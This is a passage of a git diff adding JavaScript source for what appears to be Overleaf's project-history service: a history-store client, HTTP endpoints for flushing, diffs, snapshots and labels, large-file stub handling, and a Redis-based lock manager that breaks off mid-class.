{ 'Content-Length': byteLength }, // add the content length to work around problems with chunked encoding in node 18 + ...getHistoryFetchOptions(), + }) + .then(res => { + callback(null, hash) + }) + .catch(err => { + callback(OError.tag(err)) + }) + }) +} + +export function initializeProject(historyId, callback) { + _requestHistoryService( + { + method: 'POST', + path: 'projects', + json: historyId == null ? true : { projectId: historyId }, + }, + (error, project) => { + if (error) { + return callback(OError.tag(error)) + } + + const id = project.projectId + if (id == null) { + error = new OError('history store did not return a project id', id) + return callback(error) + } + + callback(null, id) + } + ) +} + +export function deleteProject(projectId, callback) { + _requestHistoryService( + { method: 'DELETE', path: `projects/${projectId}` }, + callback + ) +} + +const getProjectBlobAsync = promisify(getProjectBlob) + +class BlobStore { + constructor(projectId) { + this.projectId = projectId + } + + async getString(hash) { + return await getProjectBlobAsync(this.projectId, hash) + } + + async getObject(hash) { + const string = await this.getString(hash) + return JSON.parse(string) + } +} + +export function getBlobStore(projectId) { + return new BlobStore(projectId) +} + +function _requestOptions(options) { + const requestOptions = { + method: options.method || 'GET', + url: `${Settings.overleaf.history.host}/${options.path}`, + timeout: HTTP_REQUEST_TIMEOUT, + auth: { + user: Settings.overleaf.history.user, + pass: Settings.overleaf.history.pass, + sendImmediately: true, + }, + } + + if (options.json != null) { + requestOptions.json = options.json + } + + if (options.body != null) { + requestOptions.body = options.body + } + + if (options.qs != null) { + requestOptions.qs = options.qs + } + + return requestOptions +} + +/** + * @return {RequestInit} + */ +function getHistoryFetchOptions() { + return { + signal: AbortSignal.timeout(HTTP_REQUEST_TIMEOUT), + basicAuth: { + user: Settings.overleaf.history.user, + password: Settings.overleaf.history.pass, + }, + } +} + +function _requestHistoryService(options, callback) { + const requestOptions = _requestOptions(options) + request(requestOptions, (error, res, body) => { + if (error) { + return callback(OError.tag(error)) + } + + if (res.statusCode >= 200 && res.statusCode < 300) { + 
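+      // success: hand the body (JSON-parsed when options.json was set) back
+      // to the caller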
callback(null, body) + } else { + const { method, url, qs } = requestOptions + error = new OError( + `history store a non-success status code: ${res.statusCode}`, + { method, url, qs, statusCode: res.statusCode } + ) + callback(error) + } + }) +} + +export const promises = { + /** @type {(projectId: string, historyId: string) => Promise<{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}>} */ + getMostRecentChunk: promisify(getMostRecentChunk), + getChunkAtVersion: promisify(getChunkAtVersion), + getMostRecentVersion: promisifyMultiResult(getMostRecentVersion, [ + 'version', + 'projectStructureAndDocVersions', + 'lastChange', + 'mostRecentChunk', + ]), + getMostRecentVersionRaw: promisify(getMostRecentVersionRaw), + getProjectBlob: promisify(getProjectBlob), + getProjectBlobStream: promisify(getProjectBlobStream), + sendChanges: promisify(sendChanges), + createBlobForUpdate: promisify(createBlobForUpdate), + initializeProject: promisify(initializeProject), + deleteProject: promisify(deleteProject), +} diff --git a/services/project-history/app/js/HttpController.js b/services/project-history/app/js/HttpController.js new file mode 100644 index 0000000..9272487 --- /dev/null +++ b/services/project-history/app/js/HttpController.js @@ -0,0 +1,582 @@ +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import request from 'request' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as SummarizedUpdatesManager from './SummarizedUpdatesManager.js' +import * as DiffManager from './DiffManager.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as SnapshotManager from './SnapshotManager.js' +import * as HealthChecker from './HealthChecker.js' +import * as SyncManager from './SyncManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' +import * as RedisManager from './RedisManager.js' +import * as LabelsManager from './LabelsManager.js' +import * as HistoryApiManager from './HistoryApiManager.js' +import * as RetryManager from './RetryManager.js' +import * as FlushManager from './FlushManager.js' +import { pipeline } from 'node:stream' +import { RequestFailedError } from '@overleaf/fetch-utils' + +const ONE_DAY_IN_SECONDS = 24 * 60 * 60 + +export function getProjectBlob(req, res, next) { + const historyId = req.params.history_id + const blobHash = req.params.hash + HistoryStoreManager.getProjectBlobStream( + historyId, + blobHash, + (err, stream) => { + if (err != null) { + if (err instanceof RequestFailedError && err.response.status === 404) { + return res.status(404).end() + } + return next(OError.tag(err)) + } + res.setHeader('Cache-Control', `private, max-age=${ONE_DAY_IN_SECONDS}`) + pipeline(stream, res, err => { + if (err) next(err) + // res.end() is already called via 'end' event by pipeline. 
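+      // net effect: the blob is streamed with a private one-day Cache-Control
+      // header, while a 404 from the history store is passed through above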
+ }) + } + ) +} + +export function initializeProject(req, res, next) { + const { historyId } = req.body + HistoryStoreManager.initializeProject(historyId, (error, id) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ project: { id } }) + }) +} + +export function flushProject(req, res, next) { + const projectId = req.params.project_id + if (req.query.debug) { + logger.debug( + { projectId }, + 'compressing project history in single-step mode' + ) + UpdatesProcessor.processSingleUpdateForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + }) + } else if (req.query.bisect) { + logger.debug({ projectId }, 'compressing project history in bisect mode') + UpdatesProcessor.processUpdatesForProjectUsingBisect( + projectId, + UpdatesProcessor.REDIS_READ_BATCH_SIZE, + error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + } + ) + } else { + logger.debug({ projectId }, 'compressing project history') + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + }) + } +} + +export function dumpProject(req, res, next) { + const projectId = req.params.project_id + const batchSize = req.query.count || UpdatesProcessor.REDIS_READ_BATCH_SIZE + logger.debug({ projectId }, 'retrieving raw updates') + UpdatesProcessor.getRawUpdates(projectId, batchSize, (error, rawUpdates) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json(rawUpdates) + }) +} + +export function flushOld(req, res, next) { + const { maxAge, queueDelay, limit, timeout, background } = req.query + const options = { maxAge, queueDelay, limit, timeout, background } + FlushManager.flushOldOps(options, (error, results) => { + if (error != null) { + return next(OError.tag(error)) + } + res.send(results) + }) +} + +export function getDiff(req, res, next) { + const projectId = req.params.project_id + const { pathname, from, to } = req.query + if (pathname == null) { + return res.sendStatus(400) + } + + logger.debug({ projectId, pathname, from, to }, 'getting diff') + DiffManager.getDiff(projectId, pathname, from, to, (error, diff) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ diff }) + }) +} + +export function getFileTreeDiff(req, res, next) { + const projectId = req.params.project_id + const { to, from } = req.query + + DiffManager.getFileTreeDiff(projectId, from, to, (error, diff) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ diff }) + }) +} + +export function getUpdates(req, res, next) { + const projectId = req.params.project_id + const { before, min_count: minCount } = req.query + SummarizedUpdatesManager.getSummarizedProjectUpdates( + projectId, + { before, min_count: minCount }, + (error, updates, nextBeforeTimestamp) => { + if (error != null) { + return next(OError.tag(error)) + } + for (const update of updates) { + // Sets don't JSONify, so convert to arrays + update.pathnames = Array.from(update.pathnames || []).sort() + } + res.json({ + updates, + nextBeforeTimestamp, + }) + } + ) +} + +export function latestVersion(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'compressing project history and getting version') + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + WebApiManager.getHistoryId(projectId, (error, historyId) => { + 
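+      // the history store is addressed by history id rather than by the web
+      // project id, so resolve it first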
if (error != null) { + return next(OError.tag(error)) + } + HistoryStoreManager.getMostRecentVersion( + projectId, + historyId, + (error, version, projectStructureAndDocVersions, lastChange) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ + version, + timestamp: lastChange != null ? lastChange.timestamp : undefined, + v2Authors: lastChange != null ? lastChange.v2Authors : undefined, + }) + } + ) + }) + }) +} + +export function getFileSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getFileSnapshotStream( + projectId, + version, + pathname, + (error, stream) => { + if (error != null) { + return next(OError.tag(error)) + } + pipeline(stream, res, err => { + if (err) next(err) + // res.end() is already called via 'end' event by pipeline. + }) + } + ) +} + +export function getRangesSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getRangesSnapshot( + projectId, + version, + pathname, + (err, ranges) => { + if (err) { + return next(OError.tag(err)) + } + res.json(ranges) + } + ) +} + +export function getFileMetadataSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getFileMetadataSnapshot( + projectId, + version, + pathname, + (err, data) => { + if (err) { + return next(OError.tag(err)) + } + res.json(data) + } + ) +} + +export function getLatestSnapshot(req, res, next) { + const { project_id: projectId } = req.params + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) return next(OError.tag(error)) + SnapshotManager.getLatestSnapshot( + projectId, + historyId, + (error, details) => { + if (error != null) { + return next(error) + } + const { snapshot, version } = details + res.json({ snapshot: snapshot.toRaw(), version }) + } + ) + }) +} + +export function getChangesInChunkSince(req, res, next) { + const { project_id: projectId } = req.params + const { since } = req.query + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) return next(OError.tag(error)) + SnapshotManager.getChangesInChunkSince( + projectId, + historyId, + since, + (error, details) => { + if (error != null) { + return next(error) + } + const { latestStartVersion, changes } = details + res.json({ + latestStartVersion, + changes: changes.map(c => c.toRaw()), + }) + } + ) + }) +} + +export function getProjectSnapshot(req, res, next) { + const { project_id: projectId, version } = req.params + SnapshotManager.getProjectSnapshot( + projectId, + version, + (error, snapshotData) => { + if (error != null) { + return next(error) + } + res.json(snapshotData) + } + ) +} + +export function getPathsAtVersion(req, res, next) { + const { project_id: projectId, version } = req.params + SnapshotManager.getPathsAtVersion(projectId, version, (error, result) => { + if (error != null) { + return next(error) + } + res.json(result) + }) +} + +export function healthCheck(req, res) { + HealthChecker.check(err => { + if (err != null) { + logger.err({ err }, 'error performing health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +export function checkLock(req, res) { + HealthChecker.checkLock(err => { + if (err != null) { + logger.err({ err }, 'error performing lock check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +export function resyncProject(req, res, next) { + const projectId = req.params.project_id + const options = {} + if 
(req.body.origin) { + options.origin = req.body.origin + } + if (req.body.historyRangesMigration) { + options.historyRangesMigration = req.body.historyRangesMigration + } + if (req.query.force || req.body.force) { + // this will delete the queue and clear the sync state + // use if the project is completely broken + SyncManager.startHardResync(projectId, options, error => { + if (error != null) { + return next(error) + } + // flush the sync operations + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) + }) + } else { + SyncManager.startResync(projectId, options, error => { + if (error != null) { + return next(error) + } + // flush the sync operations + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) + }) + } +} + +export function forceDebugProject(req, res, next) { + const projectId = req.params.project_id + // set the debug flag to true unless we see ?clear=true + const state = !req.query.clear + ErrorRecorder.setForceDebug(projectId, state, error => { + if (error != null) { + return next(error) + } + // display the failure record to help debugging + ErrorRecorder.getFailureRecord(projectId, (error, result) => { + if (error != null) { + return next(error) + } + res.send(result) + }) + }) +} + +export function getFailures(req, res, next) { + ErrorRecorder.getFailures((error, result) => { + if (error != null) { + return next(error) + } + res.send({ failures: result }) + }) +} + +export function getQueueCounts(req, res, next) { + RedisManager.getProjectIdsWithHistoryOpsCount((err, queuedProjectsCount) => { + if (err != null) { + return next(err) + } + res.send({ queuedProjects: queuedProjectsCount }) + }) +} + +export function getLabels(req, res, next) { + const projectId = req.params.project_id + HistoryApiManager.shouldUseProjectHistory( + projectId, + (error, shouldUseProjectHistory) => { + if (error != null) { + return next(error) + } + if (shouldUseProjectHistory) { + LabelsManager.getLabels(projectId, (error, labels) => { + if (error != null) { + return next(error) + } + res.json(labels) + }) + } else { + res.sendStatus(409) + } + } + ) +} + +export function createLabel(req, res, next) { + const { project_id: projectId, user_id: userIdParam } = req.params + const { + version, + comment, + user_id: userIdBody, + created_at: createdAt, + validate_exists: validateExists, + } = req.body + + // Temporarily looking up both params and body while rolling out changes + // in the router path - https://github.com/overleaf/internal/pull/20200 + const userId = userIdParam || userIdBody + + HistoryApiManager.shouldUseProjectHistory( + projectId, + (error, shouldUseProjectHistory) => { + if (error != null) { + return next(error) + } + if (shouldUseProjectHistory) { + LabelsManager.createLabel( + projectId, + userId, + version, + comment, + createdAt, + validateExists, + (error, label) => { + if (error != null) { + return next(error) + } + res.json(label) + } + ) + } else { + logger.error( + { + projectId, + userId, + version, + comment, + createdAt, + validateExists, + }, + 'not using v2 history' + ) + res.sendStatus(409) + } + } + ) +} + +/** + * This will delete a label if it is owned by the current user. If you wish to + * delete a label regardless of the current user, then use `deleteLabel` instead. 
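+ *
+ * The delete below matches on project id, user id and label id together, so a
+ * label owned by a different user is left in place.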
+ */ +export function deleteLabelForUser(req, res, next) { + const { + project_id: projectId, + user_id: userId, + label_id: labelId, + } = req.params + + LabelsManager.deleteLabelForUser(projectId, userId, labelId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function deleteLabel(req, res, next) { + const { project_id: projectId, label_id: labelId } = req.params + + LabelsManager.deleteLabel(projectId, labelId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function retryFailures(req, res, next) { + const { failureType, timeout, limit, callbackUrl } = req.query + if (callbackUrl) { + // send response but run in background when callbackUrl provided + res.send({ retryStatus: 'running retryFailures in background' }) + } + RetryManager.retryFailures( + { failureType, timeout, limit }, + (error, result) => { + if (callbackUrl) { + // if present, notify the callbackUrl on success + if (!error) { + // Needs Node 12 + // const callbackHeaders = Object.fromEntries(Object.entries(req.headers || {}).filter(([k,v]) => k.match(/^X-CALLBACK-/i))) + const callbackHeaders = {} + for (const key of Object.getOwnPropertyNames( + req.headers || {} + ).filter(key => key.match(/^X-CALLBACK-/i))) { + const found = key.match(/^X-CALLBACK-(.*)/i) + callbackHeaders[found[1]] = req.headers[key] + } + request({ url: callbackUrl, headers: callbackHeaders }) + } + } else { + if (error != null) { + return next(error) + } + res.send({ retryStatus: result }) + } + } + ) +} + +export function transferLabels(req, res, next) { + const { from_user: fromUser, to_user: toUser } = req.params + LabelsManager.transferLabels(fromUser, toUser, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function deleteProject(req, res, next) { + const { project_id: projectId } = req.params + // clear the timestamp before clearing the queue, + // because the queue location is used in the migration + RedisManager.clearFirstOpTimestamp(projectId, err => { + if (err) { + return next(err) + } + RedisManager.clearCachedHistoryId(projectId, err => { + if (err) { + return next(err) + } + RedisManager.destroyDocUpdatesQueue(projectId, err => { + if (err) { + return next(err) + } + SyncManager.clearResyncState(projectId, err => { + if (err) { + return next(err) + } + ErrorRecorder.clearError(projectId, err => { + if (err) { + return next(err) + } + res.sendStatus(204) + }) + }) + }) + }) + }) +} diff --git a/services/project-history/app/js/LabelsManager.js b/services/project-history/app/js/LabelsManager.js new file mode 100644 index 0000000..fe3dd4e --- /dev/null +++ b/services/project-history/app/js/LabelsManager.js @@ -0,0 +1,175 @@ +import OError from '@overleaf/o-error' +import { db, ObjectId } from './mongodb.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as WebApiManager from './WebApiManager.js' + +export function getLabels(projectId, callback) { + _toObjectId(projectId, function (error, projectId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels + .find({ project_id: new ObjectId(projectId) }) + .toArray(function (error, labels) { + if (error) { + return callback(OError.tag(error)) + } + const formattedLabels = labels.map(_formatLabel) + callback(null, formattedLabels) + }) + }) +} + +export function createLabel( + projectId, + userId, + version, + comment, + 
createdAt, + shouldValidateExists, + callback +) { + const validateVersionExists = function (callback) { + if (shouldValidateExists === false) { + callback() + } else { + _validateChunkExistsForVersion(projectId.toString(), version, callback) + } + } + + _toObjectId(projectId, userId, function (error, projectId, userId) { + if (error) { + return callback(OError.tag(error)) + } + validateVersionExists(function (error) { + if (error) { + return callback(OError.tag(error)) + } + + createdAt = createdAt != null ? new Date(createdAt) : new Date() + + const label = { + project_id: new ObjectId(projectId), + comment, + version, + created_at: createdAt, + } + if (userId) { + label.user_id = userId + } + db.projectHistoryLabels.insertOne(label, function (error, confirmation) { + if (error) { + return callback(OError.tag(error)) + } + label._id = confirmation.insertedId + callback(null, _formatLabel(label)) + }) + }) + }) +} + +export function deleteLabelForUser(projectId, userId, labelId, callback) { + _toObjectId( + projectId, + userId, + labelId, + function (error, projectId, userId, labelId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.deleteOne( + { + _id: new ObjectId(labelId), + project_id: new ObjectId(projectId), + user_id: new ObjectId(userId), + }, + callback + ) + } + ) +} + +export function deleteLabel(projectId, labelId, callback) { + _toObjectId(projectId, labelId, function (error, projectId, labelId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.deleteOne( + { + _id: new ObjectId(labelId), + project_id: new ObjectId(projectId), + }, + callback + ) + }) +} + +export function transferLabels(fromUserId, toUserId, callback) { + _toObjectId(fromUserId, toUserId, function (error, fromUserId, toUserId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.updateMany( + { + user_id: fromUserId, + }, + { + $set: { user_id: toUserId }, + }, + callback + ) + }) +} + +function _toObjectId(...args1) { + const adjustedLength = Math.max(args1.length, 1) + const args = args1.slice(0, adjustedLength - 1) + const callback = args1[adjustedLength - 1] + try { + const ids = args.map(id => { + if (id) { + return new ObjectId(id) + } else { + return undefined + } + }) + callback(null, ...ids) + } catch (error) { + callback(error) + } +} + +function _formatLabel(label) { + return { + id: label._id, + comment: label.comment, + version: label.version, + user_id: label.user_id, + created_at: label.created_at, + } +} + +function _validateChunkExistsForVersion(projectId, version, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, function (error) { + if (error) { + return callback(error) + } + WebApiManager.getHistoryId(projectId, function (error, historyId) { + if (error) { + return callback(error) + } + HistoryStoreManager.getChunkAtVersion( + projectId, + historyId, + version, + function (error) { + if (error) { + return callback(error) + } + callback() + } + ) + }) + }) +} diff --git a/services/project-history/app/js/LargeFileManager.js b/services/project-history/app/js/LargeFileManager.js new file mode 100644 index 0000000..dfdc994 --- /dev/null +++ b/services/project-history/app/js/LargeFileManager.js @@ -0,0 +1,88 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
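+//
+// Oversized files are swapped for a small text stub before being sent to the
+// history store. The stub written by createStub below looks like:
+//
+//   FileTooLargeError v1
+//   File too large to be stored in history service
+//   id <fileId>
+//   size <fileSize> bytes
+//   hash <fileHash>
+//
+// followed by a null byte so the stub is treated as a binary file.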
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import fs from 'node:fs' +import { randomUUID } from 'node:crypto' +import Path from 'node:path' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import _ from 'lodash' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as HashManager from './HashManager.js' + +export function createStub(fsPath, fileId, fileSize, fileHash, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + const newFsPath = Path.join( + Settings.path.uploadFolder, + randomUUID() + `-${fileId}-stub` + ) + const writeStream = fs.createWriteStream(newFsPath) + writeStream.on('error', function (error) { + OError.tag(error, 'error writing stub file', { fsPath, newFsPath }) + return fs.unlink(newFsPath, () => callback(error)) + }) + writeStream.on('finish', function () { + logger.debug( + { fsPath, fileId, fileSize, fileHash }, + 'replaced large file with stub' + ) + return callback(null, newFsPath) + }) // let the consumer unlink the file + const stubLines = [ + 'FileTooLargeError v1', + 'File too large to be stored in history service', + `id ${fileId}`, + `size ${fileSize} bytes`, + `hash ${fileHash}`, + '\0', // null byte to make this a binary file + ] + writeStream.write(stubLines.join('\n')) + return writeStream.end() +} + +export function replaceWithStubIfNeeded(fsPath, fileId, fileSize, callback) { + if (callback == null) { + callback = function () {} + } + if ( + Settings.maxFileSizeInBytes != null && + fileSize > Settings.maxFileSizeInBytes + ) { + logger.error( + { fsPath, fileId, maxFileSizeInBytes: Settings.maxFileSizeInBytes }, + 'file too large, will use stub' + ) + return HashManager._getBlobHash(fsPath, function (error, fileHash) { + if (error != null) { + return callback(error) + } + return createStub( + fsPath, + fileId, + fileSize, + fileHash, + function (error, newFsPath) { + if (error != null) { + return callback(error) + } + return callback(null, newFsPath) + } + ) + }) + } else { + return callback(null, fsPath) + } +} diff --git a/services/project-history/app/js/LocalFileWriter.js b/services/project-history/app/js/LocalFileWriter.js new file mode 100644 index 0000000..3629a55 --- /dev/null +++ b/services/project-history/app/js/LocalFileWriter.js @@ -0,0 +1,114 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import fs from 'node:fs' +import { pipeline } from 'node:stream' +import { randomUUID } from 'node:crypto' +import path from 'node:path' +import _ from 'lodash' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import * as LargeFileManager from './LargeFileManager.js' + +// +// This method takes a stream and provides you a new stream which is now +// reading from disk. 
+// +// This is useful if we're piping one network stream to another. If the stream +// we're piping to can't consume data as quickly as the one we're consuming +// from then large quantities of data may be held in memory. Instead the read +// stream can be passed to this method, the data will then be held on disk +// rather than in memory and will be cleaned up once it has been consumed. +// +export function bufferOnDisk( + inStream, + url, + fileId, + consumeOutStream, + callback +) { + const timer = new metrics.Timer('LocalFileWriter.writeStream') + + const fsPath = path.join( + Settings.path.uploadFolder, + randomUUID() + `-${fileId}` + ) + + const cleanup = _.once((streamError, res) => { + return deleteFile(fsPath, function (cleanupError) { + if (streamError) { + OError.tag(streamError, 'error deleting temporary file', { + fsPath, + url, + }) + } + if (cleanupError) { + OError.tag(cleanupError) + } + if (streamError && cleanupError) { + // logging the cleanup error in case only the stream error is sent to the callback + logger.error(cleanupError) + } + return callback(streamError || cleanupError, res) + }) + }) + + logger.debug({ fsPath, url }, 'writing file locally') + + const writeStream = fs.createWriteStream(fsPath) + pipeline(inStream, writeStream, err => { + if (err) { + OError.tag(err, 'problem writing file locally', { + fsPath, + url, + }) + return cleanup(err) + } + timer.done() + // in future check inStream.response.headers for hash value here + logger.debug({ fsPath, url }, 'stream closed after writing file locally') + const fileSize = writeStream.bytesWritten + return LargeFileManager.replaceWithStubIfNeeded( + fsPath, + fileId, + fileSize, + function (err, newFsPath) { + if (err != null) { + OError.tag(err, 'problem in large file manager', { + newFsPath, + fsPath, + fileId, + fileSize, + }) + return cleanup(err) + } + return consumeOutStream(newFsPath, cleanup) + } + ) + }) +} + +export function deleteFile(fsPath, callback) { + if (fsPath == null || fsPath === '') { + return callback() + } + logger.debug({ fsPath }, 'removing local temp file') + return fs.unlink(fsPath, function (err) { + if (err != null && err.code !== 'ENOENT') { + // ignore errors deleting the file when it was never created + return callback(OError.tag(err)) + } else { + return callback() + } + }) +} diff --git a/services/project-history/app/js/LockManager.js b/services/project-history/app/js/LockManager.js new file mode 100644 index 0000000..088111b --- /dev/null +++ b/services/project-history/app/js/LockManager.js @@ -0,0 +1,314 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
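+//
+// Locking below follows the single-instance Redis distlock recipe: acquire
+// with SET key <random value> EX <ttl> NX, then release or extend via a Lua
+// script that checks the stored value first, so a lock that expired and was
+// re-acquired by another process is never deleted or extended by this one.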
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+import { promisify } from 'node:util'
+import async from 'async'
+import metrics from '@overleaf/metrics'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
+import os from 'node:os'
+import crypto from 'node:crypto'
+import logger from '@overleaf/logger'
+import OError from '@overleaf/o-error'
+
+const LOCK_TEST_INTERVAL = 50 // 50ms between each test of the lock
+const MAX_LOCK_WAIT_TIME = 10000 // 10s maximum time to spend trying to get the lock
+export const LOCK_TTL = 360 // seconds
+export const MIN_LOCK_EXTENSION_INTERVAL = 1000 // 1s minimum interval when extending a lock
+
+export const UNLOCK_SCRIPT =
+  'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end'
+const EXTEND_SCRIPT =
+  'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("expire", KEYS[1], ARGV[2]) else return 0 end'
+
+const HOST = os.hostname()
+const PID = process.pid
+const RND = crypto.randomBytes(4).toString('hex')
+let COUNT = 0
+
+const rclient = redis.createClient(Settings.redis.lock)
+
+/**
+ * Container for functions that need to be mocked in tests
+ *
+ * TODO: Rewrite tests in terms of exported functions only
+ */
+export const _mocks = {}
+
+// Use a signed lock value as described in
+// http://redis.io/topics/distlock#correct-implementation-with-a-single-instance
+// to prevent accidental unlocking by multiple processes
+_mocks.randomLock = () => {
+  const time = Date.now()
+  return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}`
+}
+
+export function randomLock(...args) {
+  return _mocks.randomLock(...args)
+}
+
+_mocks.tryLock = (key, callback) => {
+  if (callback == null) {
+    callback = function () {}
+  }
+  const lockValue = randomLock()
+  return rclient.set(
+    key,
+    lockValue,
+    'EX',
+    LOCK_TTL,
+    'NX',
+    function (err, gotLock) {
+      if (err != null) {
+        return callback(
+          OError.tag(err, 'redis error trying to get lock', { key })
+        )
+      }
+      if (gotLock === 'OK') {
+        metrics.inc('lock.project.try.success')
+        return callback(err, true, lockValue)
+      } else {
+        metrics.inc('lock.project.try.failed')
+        return callback(err, false)
+      }
+    }
+  )
+}
+
+export function tryLock(...args) {
+  _mocks.tryLock(...args)
+}
+
+_mocks.extendLock = (key, lockValue, callback) => {
+  if (callback == null) {
+    callback = function () {}
+  }
+  return rclient.eval(
+    EXTEND_SCRIPT,
+    1,
+    key,
+    lockValue,
+    LOCK_TTL,
+    function (err, result) {
+      if (err != null) {
+        return callback(
+          OError.tag(err, 'redis error trying to extend lock', { key })
+        )
+      }
+
+      if (result != null && result !== 1) {
+        // a successful extension should update the TTL on exactly one key
+        metrics.inc('lock.project.extend.failed')
+        const error = new OError('failed to extend lock', {
+          key,
+          lockValue,
+          result,
+        })
+        return callback(error)
+      }
+
+      metrics.inc('lock.project.extend.success')
+      return callback()
+    }
+  )
+}
+
+export function extendLock(...args) {
+  _mocks.extendLock(...args)
+}
+
+_mocks.getLock = (key, callback) => {
+  let attempt
+  if (callback == null) {
+    callback = function () {}
+  }
+  const startTime = Date.now()
+  let attempts = 0
+  return (attempt = function () {
+    if (Date.now() - startTime > MAX_LOCK_WAIT_TIME) {
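+      // Illustrative timing (derived from the constants above): with
+      // LOCK_TEST_INTERVAL = 50ms and MAX_LOCK_WAIT_TIME = 10s, a contended
+      // lock is polled roughly 200 times before this Timeout error is returned.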
+      metrics.inc('lock.project.get.failed')
+      return callback(new OError('Timeout', { key }))
+    }
+
+    attempts += 1
+    return tryLock(key, function (error, gotLock, lockValue) {
+      if (error != null) {
+        return callback(OError.tag(error))
+      }
+      if (gotLock) {
+        metrics.gauge('lock.project.get.success.tries', attempts)
+        return callback(null, lockValue)
+      } else {
+        return setTimeout(attempt, LOCK_TEST_INTERVAL)
+      }
+    })
+  })()
+}
+
+export function getLock(...args) {
+  _mocks.getLock(...args)
+}
+
+export function checkLock(key, callback) {
+  if (callback == null) {
+    callback = function () {}
+  }
+  return rclient.exists(key, function (err, exists) {
+    if (err != null) {
+      return callback(OError.tag(err))
+    }
+    exists = parseInt(exists)
+    if (exists === 1) {
+      return callback(err, false)
+    } else {
+      return callback(err, true)
+    }
+  })
+}
+
+_mocks.releaseLock = (key, lockValue, callback) => {
+  return rclient.eval(UNLOCK_SCRIPT, 1, key, lockValue, function (err, result) {
+    if (err != null) {
+      return callback(OError.tag(err))
+    }
+    if (result != null && result !== 1) {
+      // successful unlock should release exactly one key
+      const error = new OError('tried to release timed out lock', {
+        key,
+        lockValue,
+        redis_result: result,
+      })
+      return callback(error)
+    }
+    return callback(err, result)
+  })
+}
+
+export function releaseLock(...args) {
+  _mocks.releaseLock(...args)
+}
+
+export function runWithLock(key, runner, callback) {
+  if (callback == null) {
+    callback = function () {}
+  }
+  return getLock(key, function (error, lockValue) {
+    if (error != null) {
+      return callback(OError.tag(error))
+    }
+
+    const lock = new Lock(key, lockValue)
+    return runner(lock.extend.bind(lock), (error1, ...args) =>
+      lock.release(function (error2) {
+        error = error1 || error2
+        if (error != null) {
+          return callback(OError.tag(error), ...Array.from(args))
+        }
+        return callback(null, ...Array.from(args))
+      })
+    )
+  })
+}
+
+export function healthCheck(callback) {
+  const action = (extendLock, releaseLock) => releaseLock()
+  return runWithLock(
+    `HistoryLock:HealthCheck:host=${HOST}:pid=${PID}:random=${RND}`,
+    action,
+    callback
+  )
+}
+
+export function close(callback) {
+  rclient.quit()
+  return rclient.once('end', callback)
+}
+
+class Lock {
+  constructor(key, value) {
+    this.key = key
+    this.value = value
+    this.slowExecutionError = new OError('slow execution during lock')
+    this.lockTakenAt = Date.now()
+    this.timer = new metrics.Timer('lock.project')
+  }
+
+  extend(callback) {
